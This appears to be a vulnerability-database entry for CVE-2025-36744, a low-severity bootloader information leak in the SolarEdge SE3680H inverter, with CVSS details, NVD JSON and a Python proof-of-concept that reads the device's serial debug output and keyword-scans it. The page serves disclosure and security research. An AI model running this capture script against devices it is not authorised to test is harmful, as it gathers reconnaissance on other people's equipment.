Security Vulnerability Report
CVE-2025-36744 CVSS 2.4 LOW

CVE-2025-36744

Published: 2025-12-12 15:15:53
Last Modified: 2025-12-23 17:20:12

Description

SolarEdge SE3680H has unauthenticated disclosure of sensitive information during the bootloader loop. While the device repeatedly initializes and waits for boot instructions, the bootloader emits diagnostic output; this behavior can leak operating system information.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:solaredge:se3680h_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:solaredge:se3680h:-:*:*:*:*:*:*:* - NOT VULNERABLE
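SolarEdge SE3680H (listed here as "all known versions affected"; the NVD configuration in the Raw JSON Data below bounds the vulnerable firmware range to 4.0 up to, but excluding, 4.22)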

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
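#!/usr/bin/env python3
"""
CVE-2025-36744 PoC - SolarEdge SE3680H Bootloader Information Disclosure

This PoC demonstrates how to capture sensitive information from the
SolarEdge SE3680H bootloader.

Note: Physical access to the device is required.

Reviewer notes:
- The script is passive: it opens a serial port, reads what the device
  prints and keyword-scans the text. It never writes to the port.
- analyze_captured_data() reports case-insensitive substring hits, so a
  hit is a pointer for manual review of the log, not proof of disclosure.
- The NVD configuration published with this CVE lists SE3680H firmware
  4.0 up to (excluding) 4.22 as affected; check the installed firmware
  version against that range when assessing exposure.
"""

import sys
import time

try:
    import serial
except ImportError:
    # pyserial is a third-party package. Defer the failure to
    # connect_to_device() so the user gets a readable message instead of a
    # traceback at import time.
    serial = None


def connect_to_device(port='/dev/ttyUSB0', baudrate=115200):
    """
    Connect to the SolarEdge device via serial debug port.

    Common ports: /dev/ttyUSB0, /dev/ttyUSB1, COM1, COM2

    Args:
        port: Serial device path or COM port name.
        baudrate: Line speed. The port is opened 8 data bits, no parity,
            one stop bit, with a 10 second read timeout.

    Returns:
        The open ``serial.Serial`` object, or ``None`` when pyserial is not
        installed or the port cannot be opened (a message is printed).
    """
    if serial is None:
        print("[-] pyserial is not installed; cannot open a serial port")
        return None

    try:
        return serial.Serial(
            port=port,
            baudrate=baudrate,
            bytesize=serial.EIGHTBITS,
            parity=serial.PARITY_NONE,
            stopbits=serial.STOPBITS_ONE,
            timeout=10,
        )
    except serial.SerialException as e:
        print(f"[-] Failed to connect to {port}: {e}")
        return None


def capture_bootloader_output(ser, duration=30):
    """
    Capture bootloader diagnostic output for specified duration.

    The bootloader loop continuously outputs system information.

    Args:
        ser: Object exposing ``in_waiting`` and ``read(size)`` like a
            pyserial port.
        duration: Capture window in seconds.

    Returns:
        Everything read during the window, decoded as UTF-8 with
        undecodable bytes dropped. If the port fails mid-capture, the text
        gathered so far is returned.
    """
    print(f"[*] Capturing bootloader output for {duration} seconds...")
    print("[*] Waiting for device initialization...\n")

    # monotonic() keeps the window correct if the wall clock is adjusted.
    deadline = time.monotonic() + duration
    output_buffer = []

    while time.monotonic() < deadline:
        try:
            pending = ser.in_waiting
            data = ser.read(pending) if pending > 0 else b''
        except OSError as e:
            # pyserial's SerialException derives from IOError/OSError. A
            # failing port will not recover by polling it again, so stop
            # and keep what was captured instead of logging the same error
            # every 100 ms until the window ends.
            print(f"[-] Error reading data: {e}")
            break

        if data:
            decoded_data = data.decode('utf-8', errors='ignore')
            output_buffer.append(decoded_data)
            print(decoded_data, end='')

        time.sleep(0.1)

    return ''.join(output_buffer)


def analyze_captured_data(data):
    """
    Analyze captured data for sensitive information.

    Look for OS details, kernel info, filesystem data, etc.

    Matching is a case-insensitive substring test, so short keywords also
    hit inside longer words (``ext`` in "next", ``IP`` in "script").

    Args:
        data: Captured text.

    Returns:
        Dict mapping category name to the list of keywords found, in the
        order they are declared. Categories without a hit are omitted.
    """
    sensitive_patterns = {
        'os_version': ['Linux', 'kernel', 'version', 'release'],
        'filesystem': ['ext', 'squashfs', 'ubi', 'jffs2', 'mount'],
        'hardware': ['CPU', 'memory', 'DDR', 'SOC', 'board'],
        'network': ['eth', 'wlan', 'IP', 'MAC', 'dhcp'],
    }

    # Lower-case the capture once instead of once per keyword.
    haystack = data.lower()

    findings = {}
    for category, keywords in sensitive_patterns.items():
        matches = [keyword for keyword in keywords if keyword.lower() in haystack]
        if matches:
            findings[category] = matches
    return findings


def main():
    """Open the port given as argv[1] (default /dev/ttyUSB0), capture, report."""
    print("=" * 60)
    print("CVE-2025-36744 PoC - SolarEdge SE3680H")
    print("Information Disclosure via Bootloader Loop")
    print("=" * 60)

    port = sys.argv[1] if len(sys.argv) > 1 else '/dev/ttyUSB0'

    ser = connect_to_device(port)
    if ser is None:
        sys.exit(1)

    print(f"[+] Connected to {port}")
    print("[+] Starting bootloader capture...\n")

    # Release the port even if the capture is interrupted (Ctrl-C, I/O error).
    try:
        captured_data = capture_bootloader_output(ser, duration=30)
    finally:
        ser.close()

    print("\n" + "=" * 60)
    print("[*] Analyzing captured data...")
    findings = analyze_captured_data(captured_data)

    if findings:
        print("\n[+] Sensitive Information Found:")
        for category, matches in findings.items():
            print(f" - {category}: {', '.join(matches)}")
    else:
        print("\n[-] No keyword matches in captured output.")

    print("\n[+] Capture complete. Serial connection closed.")


if __name__ == '__main__':
    main()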

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36744", "sourceIdentifier": "[email protected]", "published": "2025-12-12T15:15:53.050", "lastModified": "2025-12-23T17:20:12.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SolarEdge SE3680H has unauthenticated disclosure of sensitive information during the bootloader loop. While the device repeatedly initializes and waits for boot instructions, the bootloader emits diagnostic output this behavior can leak operating system information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:solaredge:se3680h_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0", "versionEndExcluding": "4.22", "matchCriteriaId": "1525CFCE-58DC-428A-B3A5-FE97E306C581"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:solaredge:se3680h:-:*:*:*:*:*:*:*", "matchCriteriaId": "CF1A53FC-7C47-46A1-8A50-9FDF74A350C7"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36744", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://csirt.divd.nl/DIVD-2025-00022/", "source": "[email protected]", "tags": ["Broken Link"]}]}}